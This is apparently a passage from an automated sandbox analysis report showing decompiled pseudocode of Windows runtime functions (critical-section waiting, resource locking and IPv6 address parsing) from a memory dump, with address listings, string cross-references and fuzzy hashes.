												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00C4F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00C93915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00C75329(_t74, _t92);
													_push(1);
													_t48 = E00C753A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                  0x00c753ab
                                                                                                                                                  0x00c753ae
                                                                                                                                                  0x00c753b1
                                                                                                                                                  0x00c753b4
                                                                                                                                                  0x00c753b7
                                                                                                                                                  0x00c905b6
                                                                                                                                                  0x00c905c0
                                                                                                                                                  0x00c905c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c905c9
                                                                                                                                                  0x00c905c9
                                                                                                                                                  0x00c905cc
                                                                                                                                                  0x00c905d5
                                                                                                                                                  0x00c905d5
                                                                                                                                                  0x00c753bd
                                                                                                                                                  0x00c753bd
                                                                                                                                                  0x00c753bd
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753be
                                                                                                                                                  0x00c753c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2269
                                                                                                                                                  0x00cb226d
                                                                                                                                                  0x00cb2349
                                                                                                                                                  0x00cb234d
                                                                                                                                                  0x00cb2273
                                                                                                                                                  0x00cb2276
                                                                                                                                                  0x00cb2279
                                                                                                                                                  0x00cb227e
                                                                                                                                                  0x00cb2283
                                                                                                                                                  0x00cb2287
                                                                                                                                                  0x00cb228a
                                                                                                                                                  0x00cb228d
                                                                                                                                                  0x00cb228f
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22bc
                                                                                                                                                  0x00cb22be
                                                                                                                                                  0x00cb22c4
                                                                                                                                                  0x00cb22cc
                                                                                                                                                  0x00cb22d0
                                                                                                                                                  0x00cb22d6
                                                                                                                                                  0x00cb22d7
                                                                                                                                                  0x00cb22da
                                                                                                                                                  0x00cb22df
                                                                                                                                                  0x00cb22e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22e6
                                                                                                                                                  0x00cb22e9
                                                                                                                                                  0x00cb22f4
                                                                                                                                                  0x00cb22f9
                                                                                                                                                  0x00cb22fa
                                                                                                                                                  0x00cb2305
                                                                                                                                                  0x00cb2314
                                                                                                                                                  0x00cb2319
                                                                                                                                                  0x00cb231a
                                                                                                                                                  0x00cb231d
                                                                                                                                                  0x00cb2320
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2323
                                                                                                                                                  0x00cb2328
                                                                                                                                                  0x00cb232d
                                                                                                                                                  0x00cb232f
                                                                                                                                                  0x00cb2331
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb2336
                                                                                                                                                  0x00cb233b
                                                                                                                                                  0x00cb233d
                                                                                                                                                  0x00cb2350
                                                                                                                                                  0x00cb2351
                                                                                                                                                  0x00cb2356
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb2359
                                                                                                                                                  0x00cb235b
                                                                                                                                                  0x00cb235d
                                                                                                                                                  0x00c75367
                                                                                                                                                  0x00c7536b
                                                                                                                                                  0x00c75372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2363
                                                                                                                                                  0x00cb2369
                                                                                                                                                  0x00cb236a
                                                                                                                                                  0x00cb236c
                                                                                                                                                  0x00cb2371
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb2379
                                                                                                                                                  0x00cb237a
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb237f
                                                                                                                                                  0x00cb2385
                                                                                                                                                  0x00cb2386
                                                                                                                                                  0x00cb2389
                                                                                                                                                  0x00cb238e
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00c75378
                                                                                                                                                  0x00c7537c
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2396
                                                                                                                                                  0x00cb2397
                                                                                                                                                  0x00cb239c
                                                                                                                                                  0x00cb23a2
                                                                                                                                                  0x00cb23a3
                                                                                                                                                  0x00cb23a6
                                                                                                                                                  0x00cb23ab
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b3
                                                                                                                                                  0x00cb23b4
                                                                                                                                                  0x00cb23b9
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23ba
                                                                                                                                                  0x00cb23bc
                                                                                                                                                  0x00cb23bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9153
                                                                                                                                                  0x00ca9158
                                                                                                                                                  0x00ca915a
                                                                                                                                                  0x00ca915e
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9166
                                                                                                                                                  0x00ca9171
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00ca9176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca9160
                                                                                                                                                  0x00cb23c6
                                                                                                                                                  0x00cb23cb
                                                                                                                                                  0x00cb23ce
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23d7
                                                                                                                                                  0x00cb23ad
                                                                                                                                                  0x00cb2390
                                                                                                                                                  0x00cb2373
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb233f
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2291
                                                                                                                                                  0x00cb2293
                                                                                                                                                  0x00cb2295
                                                                                                                                                  0x00cb229a
                                                                                                                                                  0x00cb22a1
                                                                                                                                                  0x00cb22a3
                                                                                                                                                  0x00cb22a7
                                                                                                                                                  0x00cb22a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22ab
                                                                                                                                                  0x00cb22ad
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22af
                                                                                                                                                  0x00cb22b1
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b4
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb22b6
                                                                                                                                                  0x00cb228f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cb226d
                                                                                                                                                  0x00c753cb
                                                                                                                                                  0x00c753ce
                                                                                                                                                  0x00c753d0
                                                                                                                                                  0x00c753d4
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c753d8
                                                                                                                                                  0x00c753e3
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753ea
                                                                                                                                                  0x00c753d6
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB22F4
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 00CB230B
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CB22FC
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00CB2328
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-871070163
                                                                                                                                                  • Opcode ID: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
                                                                                                                                                  • Instruction ID: a6af677decbbb2deddef7e5e6f68afc9d3f6b38bf8382dd3e88eb3e686832f83
                                                                                                                                                  • Opcode Fuzzy Hash: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
                                                                                                                                                  • Instruction Fuzzy Hash: 115116716007026BEF15DB68DC81FA673DCEF54364F114229FD18DB291EAB1EE4297A0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C7EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E00C7EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00C6DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xd3793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00C516C0(_t39);
				} else {
					_t40 = E00C4F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00C93915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00C501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xd3793c; // 0x0
								_push(_t85);
								_t44 = E00C51F28(_t71);
							} else {
								_t44 = E00C4F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00C93915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00CD2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00C7EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00C94FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00CA3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00CA3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xd320c0;
								if(_t85 != 0xd320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00CD217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00CA3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                  0x00c7ec56
                                                                                                                                                  0x00c7ec56
                                                                                                                                                  0x00c7ec56
                                                                                                                                                  0x00c7ec5c
                                                                                                                                                  0x00c7ec64
                                                                                                                                                  0x00cb23e6
                                                                                                                                                  0x00cb23eb
                                                                                                                                                  0x00cb23eb
                                                                                                                                                  0x00c7ec6a
                                                                                                                                                  0x00c7ec6c
                                                                                                                                                  0x00c7ec6f
                                                                                                                                                  0x00cb23f3
                                                                                                                                                  0x00cb23f8
                                                                                                                                                  0x00cb23fa
                                                                                                                                                  0x00cb23fc
                                                                                                                                                  0x00c7ec75
                                                                                                                                                  0x00c7ec76
                                                                                                                                                  0x00c7ec76
                                                                                                                                                  0x00c7ec7b
                                                                                                                                                  0x00c7ec7c
                                                                                                                                                  0x00c7ec7e
                                                                                                                                                  0x00cb2406
                                                                                                                                                  0x00cb2407
                                                                                                                                                  0x00cb240c
                                                                                                                                                  0x00cb240d
                                                                                                                                                  0x00cb240d
                                                                                                                                                  0x00cb240d
                                                                                                                                                  0x00cb2414
                                                                                                                                                  0x00cb2417
                                                                                                                                                  0x00cb241e
                                                                                                                                                  0x00cb2435
                                                                                                                                                  0x00cb2438
                                                                                                                                                  0x00cb243c
                                                                                                                                                  0x00cb243f
                                                                                                                                                  0x00cb2442
                                                                                                                                                  0x00cb2443
                                                                                                                                                  0x00cb2446
                                                                                                                                                  0x00cb2449
                                                                                                                                                  0x00cb2453
                                                                                                                                                  0x00cb2455
                                                                                                                                                  0x00cb245b
                                                                                                                                                  0x00cb245b
                                                                                                                                                  0x00c7eb99
                                                                                                                                                  0x00c7eb99
                                                                                                                                                  0x00c7eb9c
                                                                                                                                                  0x00c7eb9d
                                                                                                                                                  0x00c7eb9f
                                                                                                                                                  0x00c7eba2
                                                                                                                                                  0x00cb2465
                                                                                                                                                  0x00cb246b
                                                                                                                                                  0x00cb246d
                                                                                                                                                  0x00c7eba8
                                                                                                                                                  0x00c7eba9
                                                                                                                                                  0x00c7eba9
                                                                                                                                                  0x00c7ebae
                                                                                                                                                  0x00c7ebb3
                                                                                                                                                  0x00c7ebb9
                                                                                                                                                  0x00c7ebbb
                                                                                                                                                  0x00cb2513
                                                                                                                                                  0x00cb2514
                                                                                                                                                  0x00cb2519
                                                                                                                                                  0x00cb251b
                                                                                                                                                  0x00c7ec2a
                                                                                                                                                  0x00c7ec2d
                                                                                                                                                  0x00c7ec33
                                                                                                                                                  0x00c7ec36
                                                                                                                                                  0x00c7ec3a
                                                                                                                                                  0x00c7ec3e
                                                                                                                                                  0x00c7ec40
                                                                                                                                                  0x00c7ec47
                                                                                                                                                  0x00c7ec47
                                                                                                                                                  0x00c7ec40
                                                                                                                                                  0x00c522c6
                                                                                                                                                  0x00c7ebc1
                                                                                                                                                  0x00c7ebc1
                                                                                                                                                  0x00c7ebc5
                                                                                                                                                  0x00c7ec9a
                                                                                                                                                  0x00c7ec9a
                                                                                                                                                  0x00c7ebd6
                                                                                                                                                  0x00c7ebd6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c7ebbb
                                                                                                                                                  0x00cb2477
                                                                                                                                                  0x00cb247c
                                                                                                                                                  0x00cb2486
                                                                                                                                                  0x00cb248b
                                                                                                                                                  0x00cb2496
                                                                                                                                                  0x00cb249b
                                                                                                                                                  0x00cb249d
                                                                                                                                                  0x00cb24a0
                                                                                                                                                  0x00cb24a3
                                                                                                                                                  0x00cb24aa
                                                                                                                                                  0x00cb24aa
                                                                                                                                                  0x00cb24a5
                                                                                                                                                  0x00cb24a5
                                                                                                                                                  0x00cb24a5
                                                                                                                                                  0x00cb24ac
                                                                                                                                                  0x00cb24af
                                                                                                                                                  0x00cb24b0
                                                                                                                                                  0x00cb24b3
                                                                                                                                                  0x00cb24b9
                                                                                                                                                  0x00cb24ba
                                                                                                                                                  0x00cb24bb
                                                                                                                                                  0x00cb24c6
                                                                                                                                                  0x00cb24cb
                                                                                                                                                  0x00cb24cd
                                                                                                                                                  0x00cb24d0
                                                                                                                                                  0x00cb24d1
                                                                                                                                                  0x00cb24d4
                                                                                                                                                  0x00cb24d6
                                                                                                                                                  0x00cb24d9
                                                                                                                                                  0x00cb24d9
                                                                                                                                                  0x00cb24dc
                                                                                                                                                  0x00cb24df
                                                                                                                                                  0x00cb24e1
                                                                                                                                                  0x00cb24e7
                                                                                                                                                  0x00cb24e9
                                                                                                                                                  0x00cb24ec
                                                                                                                                                  0x00cb24ef
                                                                                                                                                  0x00cb24f2
                                                                                                                                                  0x00cb24f2
                                                                                                                                                  0x00cb24ef
                                                                                                                                                  0x00cb24e7
                                                                                                                                                  0x00cb24fa
                                                                                                                                                  0x00cb24ff
                                                                                                                                                  0x00cb2501
                                                                                                                                                  0x00cb2503
                                                                                                                                                  0x00cb2506
                                                                                                                                                  0x00cb250b
                                                                                                                                                  0x00c7eb8c
                                                                                                                                                  0x00c7eb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c7eb93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c7eb99
                                                                                                                                                  0x00c7ec85
                                                                                                                                                  0x00c7ec85
                                                                                                                                                  0x00c7ec85
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00CB248D
                                                                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00CB24BD
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 00CB24FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-3177188983
                                                                                                                                                  • Opcode ID: 118dd9ee3db51a0732ac70df54db0b3bf6d79c77b3bfd91deddf9e2ae5200582
                                                                                                                                                  • Instruction ID: 31b86a1ea8e06c1028eacdf533a6933e3f32c405a0027872cb83061dd205c2b7
                                                                                                                                                  • Opcode Fuzzy Hash: 118dd9ee3db51a0732ac70df54db0b3bf6d79c77b3bfd91deddf9e2ae5200582
                                                                                                                                                  • Instruction Fuzzy Hash: 22412C71600204AFCB20DFA9CC85FAB77A8EF48320F208655F969DB2D1D734EA419B65
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C8FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00C8FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00C8EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00C8EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00C8685D(_t167, 4) == 0) {
								if(E00C8685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00C8685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00C8685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00C68980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00C5DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00C8EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00C8EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                  0x00c8fcd1
                                                                                                                                                  0x00c8fcd6
                                                                                                                                                  0x00c8fcd9
                                                                                                                                                  0x00c8fcdc
                                                                                                                                                  0x00c8fcdf
                                                                                                                                                  0x00c8fce2
                                                                                                                                                  0x00c8fce5
                                                                                                                                                  0x00c8fce8
                                                                                                                                                  0x00c8fceb
                                                                                                                                                  0x00c8fced
                                                                                                                                                  0x00c8fced
                                                                                                                                                  0x00c8fcf3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fcfc
                                                                                                                                                  0x00c8fcfe
                                                                                                                                                  0x00c8fdc1
                                                                                                                                                  0x00cbecbd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeccc
                                                                                                                                                  0x00cbeccc
                                                                                                                                                  0x00cbecd2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbecdf
                                                                                                                                                  0x00cbece0
                                                                                                                                                  0x00cbece4
                                                                                                                                                  0x00cbeceb
                                                                                                                                                  0x00cbecee
                                                                                                                                                  0x00cbeca8
                                                                                                                                                  0x00cbeca8
                                                                                                                                                  0x00cbecaa
                                                                                                                                                  0x00c8fd76
                                                                                                                                                  0x00c8fd79
                                                                                                                                                  0x00c8fdb4
                                                                                                                                                  0x00c8fdb5
                                                                                                                                                  0x00c8fdb6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fdb6
                                                                                                                                                  0x00c8fd7e
                                                                                                                                                  0x00cbecfc
